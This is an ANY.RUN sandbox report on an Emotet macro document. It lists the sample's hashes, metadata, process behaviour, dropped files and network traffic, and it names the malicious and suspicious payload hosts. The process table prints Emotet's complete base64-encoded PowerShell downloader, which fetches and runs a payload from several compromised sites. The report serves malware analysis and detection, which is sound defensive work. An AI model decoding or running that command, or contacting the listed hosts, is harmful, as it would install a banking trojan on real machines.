analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

emotet.xls

Full analysis: https://app.any.run/tasks/0e798f88-ea27-4562-9456-190005b0424e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 24, 2022, 16:49:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Ut., Author: Maxime Rolland, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Sep 18 23:05:00 2020, Last Saved Time/Date: Fri Sep 18 23:05:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
MD5:

E9AFE010343209A2A0F2EB5EC56CDACC

SHA1:

96425D2E0C0B8A909933BFBD1DCE2A48D0F3AB8B

SHA256:

176F0216B10686D19666AF505DF4F1EFDEF324F146990AA31D9F6A6B30D36826

SSDEEP:

1536:CC+rdi1Ir77zOH98Wj2gpngx+a9WH4oaJrtrYYnalL2VCf3orH8:GrfrzOH98ipgiHEJrtrDnalL2Vw3I8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Reads the computer name

      • powershell.exe (PID: 1408)
    • Checks supported languages

      • powershell.exe (PID: 1408)
    • PowerShell script executed

      • powershell.exe (PID: 1408)
    • Executed via WMI

      • powershell.exe (PID: 1408)
    • Reads Environment values

      • powershell.exe (PID: 1408)
  • INFO

    • Checks supported languages

      • WINWORD.EXE (PID: 2180)
    • Reads the computer name

      • WINWORD.EXE (PID: 2180)
    • Reads mouse settings

      • WINWORD.EXE (PID: 2180)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2180)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 1408)
      • WINWORD.EXE (PID: 2180)
    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 2180)
      • powershell.exe (PID: 1408)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 23
Paragraphs: 1
Lines: 1
Company: -
Security: None
Characters: 21
Words: 3
Pages: 1
ModifyDate: 2020:09:18 22:05:00
CreateDate: 2020:09:18 22:05:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Maxime Rolland
Subject: -
Title: Ut.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2180"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\emotet.xls.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Explorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
1408powershell -en JABRAGsAeQBfAHoAYwByAD0AKAAnAE8AagAnACsAKAAnAGIAYQAnACsAJwA0ADQAJwApACsAJwAxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBzAEUAUgBwAHIAbwBmAEkATABFAFwAaQB4AF8AVQAwAGUARQBcAEQAYQAzAEkAcABmAHYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBDAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAcgBpAHQAYAB5AGAAcABSAG8AdABPAGAAQwBvAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACsAJwAgACcAKQArACcAdABsACcAKwAnAHMAJwArACcAMQAxACcAKwAoACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABQADQAZAA1AGIAZABpACAAPQAgACgAKAAnAEEAdgAnACsAJwBiACcAKQArACgAJwBqAGoAeAB4ACcAKwAnAF8AJwApACsAJwBiACcAKQA7ACQATgBsAGQAaQBrAHEAaQA9ACgAJwBFACcAKwAoACcAMgBwACcAKwAnAGoANwAnACsAJwBqAGcAJwApACkAOwAkAEMAZgBfAHkAbAA3AHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ASQB4AF8AJwArACgAJwB1ADAAJwArACcAZQBlACcAKQArACcAewAwAH0ARABhADMAaQAnACsAJwBwAGYAJwArACcAdgB7ADAAJwArACcAfQAnACkAIAAtAGYAWwBjAGgAYQByAF0AOQAyACkAKwAkAFAANABkADUAYgBkAGkAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABaAHoAZABkAG4AbgBsAD0AKAAnAEYAJwArACcANQBkACcAKwAoACcAbAAnACsAJwBvAF8AeQAnACkAKQA7ACQAWAA0ADcANABmAHkAMgA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgB3AGUAYgBjAEwAaQBFAE4AdAA7ACQAUQBhADkAdwA1ADgAdwA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAcgBlAHMAZQAnACkAKwAoACcAbABsAGUAcgAtACcAKwAnAGQAZQAnACsAJwBtACcAKQArACcAbwAtACcAKwAnAHcAZQAnACsAJwBiAHMAJwArACcAaQAnACsAJwB0AGUAJwArACcALgBjACcAKwAnAG8AJwArACcAbQAvACcAKwAoACcAZABpACcAKwAnAHMAYwB1AHMAJwApACsAKAAnAHMAJwArACcAaQBvAG4ALwBxAFcAVwBmACcAKwAnADgARgAnACkAKwAoACcAUwAnACsAJwAvACoAJwArACcAaAB0AHQAJwApACsAKAAnAHAAcwAnACsAJwA6AC8ALwB3ACcAKQArACcAdwB3ACcAKwAoACcALgBtACcAKwAnAG8AJwArACcAYwBrAGQAdQBtAHAAcwAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHQAJwArACcAZQBzAHQALwAnACsAJwBaADIAcABKAC8AKgAnACsAJwBoACcAKQArACcAdAB0ACcAKwAoACcAcABzADoAJwArACcALwAnACkAKwAoACcALwB0ACcAKwAnAHcAaQAnACkAKwAoACcAcwAnACsAJwB0AGUAJwApACsAKAAnAHIAcAAnACsAJwByAGkAJwApACsAKAAnAG4AdAAnACsAJwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGMAaAByAG8AJwApACsAKAAnAG0AZQAnACsAJwB0AGgAZQAnACkAKwAoACcAbQBlAC8AVgAnACsAJwBjAHIAJwArACcALwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8ALwAnACsAJwBzACcAKQArACcAaQBtACcAKwAoACcAdQAnACsAJwBsAGEAJwApACsAKAAnAHQAaQBvACcAKwAnAG4AcwAuAG8AcgAnACsAJwBnACcAKQArACcALwAnACsAKAAnAHIAdwBfAGMAJwArACcAbwBtACcAKQArACgAJwBtAG8AJwArACcAbgAvACcAKwAnAEsAZgAnACkAKwAnAFgAMgAnACsAKAAnAE0AVwAvACoAaAB0AHQAJwArACcAcAA6AC8AJwArACcALwBwACcAKwAnAGwAYQAnACkAKwAnAG4AJwArACcAbwAnACsAKAAnAHMAJwArACcAZABlAHMAJwArACcAYQB1AGQAZQBzAGUAJwArACcAbQBjACcAKQArACcAYQAnACsAJwByAGUAJwArACcAbgBjACcAKwAnAGkAYQAnACsAJwAuACcAKwAnAGMAbwAnACsAKAAnAG0ALwAnACsAJwBlAHIAcgBvAHMALwAnACkAKwAnAEoAJwArACgAJwBIAG8AJwArACcAcQAvACoAaAB0ACcAKwAnAHQAcAAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwB2AGkAYQBqAGUAJwArACcALQBhACcAKQArACgAJwBjACcAKwAnAGgAaQBuAGEALgAnACkAKwAnAGMAJwArACcAbwBtACcAKwAoACcALwB3AHAAJwArACcALQAnACkAKwAoACcAYQBkACcAKwAnAG0AaQAnACsAJwBuAC8AQQAxAE8AOAB0ACcAKQArACcATAAnACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcABzACcAKwAnADoALwAnACkAKwAoACcALwBjAGUAJwArACcAYQByACcAKQArACgAJwBhAGMAdQBsACcAKwAnAHQAdQByAGEAJwArACcAbAAnACsAJwAuACcAKwAnAGMAbwBtAC4AYgAnACkAKwAoACcAcgAvACcAKwAnAHQAJwApACsAJwB1ACcAKwAoACcAcgAnACsAJwBpAHMAJwArACcAbQBvAC8AbwB5AC8AJwApACkALgAiAFMAcABMAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWQA2AHQAZwB6AGwAXwA9ACgAJwBVAG4AJwArACgAJwB3ADAAbQAzACcAKwAnADEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABXAGsAZQBuADgAaQBnACAAaQBuACAAJABRAGEAOQB3ADUAOAB3ACkAewB0AHIAeQB7ACQAWAA0ADcANABmAHkAMgAuACIAZABgAG8AdwBuAEwAbwBhAGQAZgBpAGAATABlACIAKAAkAFcAawBlAG4AOABpAGcALAAgACQAQwBmAF8AeQBsADcAcgApADsAJABDAGMAeAAwADgAMAByAD0AKAAoACcAQQBkACcAKwAnAGIAcQBtADgAJwApACsAJwBiACcAKQA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABDAGYAXwB5AGwANwByACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgAzADgAMAAwACkAIAB7ACYAKAAnAEkAbgAnACsAJwB2AG8AawBlACcAKwAnAC0ASQB0AGUAbQAnACkAKAAkAEMAZgBfAHkAbAA3AHIAKQA7ACQAVABsAGEAMQBfAHMAegA9ACgAKAAnAE4AJwArACcAawBfADMAbQAnACkAKwAnAHkAcAAnACkAOwBiAHIAZQBhAGsAOwAkAEkAaABtAG4AMQA0AF8APQAoACcASgAnACsAJwBmACcAKwAoACcAdwBrACcAKwAnAHUAagA4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADcAdwBxAHoAYwBkAD0AKAAnAFkAJwArACgAJwBqAG8AeQByAG8AJwArACcAeQAnACkAKQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
35 288
Read events
24 696
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
10
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR310F.tmp.cvr
MD5:
SHA256:
1408powershell.exeC:\Users\admin\AppData\Local\Temp\Tar76F3.tmpcat
MD5:D99661D0893A52A0700B8AE68457351A
SHA256:BDD5111162A6FA25682E18FA74E37E676D49CAFCB5B7207E98E5256D1EF0D003
2180WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:6D54E64066142F5B35B75A37FB1F98A6
SHA256:627EADEFB2AAD676395AA6F95F6925C9C80572182BF4C005EF17B375EF9775B0
1408powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:D3C284009A5790C3AA90D7C5D620CA65
SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39
1408powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:17433C8967EB631570553BDDD2730AF6
SHA256:AD69E58C7492B4A466A9EB5065F4E1D20C4F1AEF88E3412572318E2120926CD5
2180WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.sigbinary
MD5:E2B16D579983FCBF5401367904D3BBB6
SHA256:FB4FE51BEC4363F5EBD859240E1CC430D02D1C2540A055ADC7864B071737B72F
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:9C3B813D132791DEADFE5CD3BDDC46A6
SHA256:BA8EABAA7646B3808F6723640B6EA20E0A65CCBCE52B2E3EDA1715D286CFEB16
2180WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442binary
MD5:13B5BC97A88302E44713483472BAFF1F
SHA256:843120B281E6AF35287657976AEF7CF18A035B5D7FF7D1292E1D4E5068E8E8B3
2180WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:9A898EB59F85D07E9947BD91DFB91BA3
SHA256:0EF1EE0570E6C803D7CA374BBB9DC38488DD8556DD677D0FB93C3C2ACF7957EE
2180WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$otet.xls.docpgc
MD5:8190089689A40695F367AC9F0D9A6ED3
SHA256:85C6A052F06FC1BD618BF665DDB8B91B2A679E457761F9A2E8A04A21D34BB20C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
14
DNS requests
11
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1408
powershell.exe
GET
404
103.91.64.211:80
http://reseller-demo-website.com/discussion/qWWf8FS/
MY
html
24.4 Kb
suspicious
2180
WINWORD.EXE
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA%2BnRyLFPYjID1ie%2Bx%2BdSjo%3D
US
der
1.47 Kb
whitelisted
2180
WINWORD.EXE
GET
200
52.109.32.63:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
GB
xml
1.96 Kb
whitelisted
1408
powershell.exe
GET
200
8.248.119.254:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?356a5b26c4183dbf
US
compressed
59.9 Kb
whitelisted
1408
powershell.exe
GET
404
52.20.84.62:80
http://simulations.org/rw_common/KfX2MW/
US
html
150 b
malicious
2180
WINWORD.EXE
GET
200
8.248.119.254:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?3c485dd218ae9c64
US
compressed
4.70 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1408
powershell.exe
103.91.64.211:80
reseller-demo-website.com
Gigabit Hosting Sdn Bhd
MY
suspicious
1408
powershell.exe
104.21.72.194:443
www.mockdumps.com
Cloudflare Inc
US
unknown
1408
powershell.exe
47.89.209.212:443
viaje-achina.com
Alibaba (China) Technology Co., Ltd.
US
suspicious
1408
powershell.exe
52.20.84.62:80
simulations.org
Amazon.com, Inc.
US
malicious
1408
powershell.exe
52.36.0.158:443
twisterprint.com
Amazon.com, Inc.
US
suspicious
1408
powershell.exe
187.1.136.118:80
planosdesaudesemcarencia.com
IPV6 Internet Ltda
BR
unknown
2180
WINWORD.EXE
52.109.32.63:80
office14client.microsoft.com
Microsoft Corporation
GB
whitelisted
2180
WINWORD.EXE
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2180
WINWORD.EXE
8.248.119.254:80
ctldl.windowsupdate.com
Level 3 Communications, Inc.
US
suspicious
1408
powershell.exe
8.248.119.254:80
ctldl.windowsupdate.com
Level 3 Communications, Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
reseller-demo-website.com
  • 103.91.64.211
suspicious
office14client.microsoft.com
  • 52.109.32.63
whitelisted
rr.office.microsoft.com
  • 52.109.124.113
whitelisted
www.mockdumps.com
  • 104.21.72.194
  • 172.67.154.140
suspicious
ctldl.windowsupdate.com
  • 8.248.119.254
  • 67.27.159.254
  • 8.253.204.120
  • 67.27.159.126
  • 8.253.95.121
whitelisted
ocsp.digicert.com
  • 93.184.220.29
whitelisted
twisterprint.com
  • 52.36.0.158
suspicious
simulations.org
  • 52.20.84.62
malicious
planosdesaudesemcarencia.com
  • 187.1.136.118
suspicious
viaje-achina.com
  • 47.89.209.212
suspicious

Threats

No threats detected
No debug info